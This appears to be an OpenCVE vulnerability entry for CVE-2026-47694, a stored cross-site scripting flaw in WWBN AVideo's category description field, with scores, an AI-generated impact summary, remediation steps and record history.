Description
WWBN AVideo is an open source video platform. In 29.0 and earlier, AVideo stores category descriptions from user input and later renders category_description as raw HTML in the Gallery view. A user who can create or edit categories can store JavaScript in a category description, which executes when another user views the affected Gallery/category page. This is a stored XSS in the category description field, separate from previously fixed XSS issues in video titles or comments.
Published: 2026-05-29
Score: 5.4 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

WWBN AVideo, an open source video platform, stores the content of a category description directly from user input and later renders it as raw HTML in the gallery view. This allows a user with permission to create or edit categories to inject and persist JavaScript code that executes in the browsers of any user who visits the affected gallery page, providing a stored cross‑site scripting vector that could compromise user accounts or deliver malware.

Affected Systems

AVideo versions 29.0 and older are affected. The vulnerable product is WWBN AVideo, and any installation running these versions without the patch can be impacted when users have rights to create or edit gallery categories.

Risk and Exploitability

The CVSS score is 5.4, indicating a medium impact. The EPSS score is not available and the vulnerability is not listed in the CISA KEV catalog. The attack vector is application‑based; an attacker must be an authenticated user with category‑management privileges to insert malicious code into the description. Once the payload is stored, it is presented unchanged to all users who view the gallery page, giving the attacker an opportunity to execute arbitrary client‑side code, potentially exfiltrating data or hijacking sessions.

Generated by OpenCVE AI on May 29, 2026 at 15:19 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to AVideo 30.0 or later, where category descriptions are properly escaped before rendering.
  • If upgrading is unavailable, restrict category creation and editing privileges to trusted administrators only.
  • If the category description field must remain, sanitize or escape the output before rendering to remove executable tags (for example, using a whitelist or a function such as htmlspecialchars).

Generated by OpenCVE AI on May 29, 2026 at 15:19 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Sat, 30 May 2026 03:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 29 May 2026 15:15:00 +0000

Type Values Removed Values Added
First Time appeared Wwbn
Wwbn avideo
Vendors & Products Wwbn
Wwbn avideo

Fri, 29 May 2026 13:45:00 +0000

Type Values Removed Values Added
Description WWBN AVideo is an open source video platform. In 29.0 and earlier, AVideo stores category descriptions from user input and later renders category_description as raw HTML in the Gallery view. A user who can create or edit categories can store JavaScript in a category description, which executes when another user views the affected Gallery/category page. This is a stored XSS in the category description field, separate from previously fixed XSS issues in video titles or comments.
Title WWBN AVideo: Stored XSS via unescaped Gallery category description
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Subscriptions

Wwbn Avideo
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-30T02:29:30.640Z

Reserved: 2026-05-19T21:18:20.403Z

Link: CVE-2026-47694

cve-icon Vulnrichment

Updated: 2026-05-30T02:29:26.064Z

cve-icon NVD

Status : Undergoing Analysis

Published: 2026-05-29T14:16:31.997

Modified: 2026-05-30T04:17:22.477

Link: CVE-2026-47694

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-29T15:30:04Z

Weaknesses